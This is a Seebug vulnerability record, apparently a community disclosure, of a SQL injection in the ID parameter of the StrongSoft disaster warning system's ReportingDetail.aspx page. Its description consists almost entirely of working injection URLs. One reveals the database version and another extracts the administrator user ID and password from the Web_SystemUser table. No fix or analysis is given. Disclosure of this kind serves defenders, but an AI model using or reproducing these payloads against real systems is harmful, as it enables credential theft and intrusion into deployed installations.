StrongSoft灾害预警系统ReportingDetail.aspx ID参数SQL注入漏洞

2016-01-26T00:00:00
ID SSV:90616
Type seebug
Reporter 哆啦A梦
Modified 2016-01-26T00:00:00

Description

``` 注入链接:/Disaster/Reporting/ReportingDetail.aspx

注入参数:ID

【获取数据库版本】

/Disaster/Reporting/ReportingDetail.aspx?ID=1' AND 3=CHAR(@@version) --

【管理员账号密码】

/Disaster/Reporting/ReportingDetail.aspx?ID=1' AND+2709=((select+top+1+UserID%2b'---'%2bUserPwd+from+strongmain.dbo.Web_SystemUser))-- ```

![](https://images.seebug.org/contribute/6b86a9d7-4019-447d-84fd-817913bc6e90-屏幕快照 2016-01-15 下午11.46.43.png)

![](https://images.seebug.org/contribute/19f7673a-7f17-492e-bbe9-e721ac1629e4-屏幕快照 2016-01-15 下午11.50.12.png)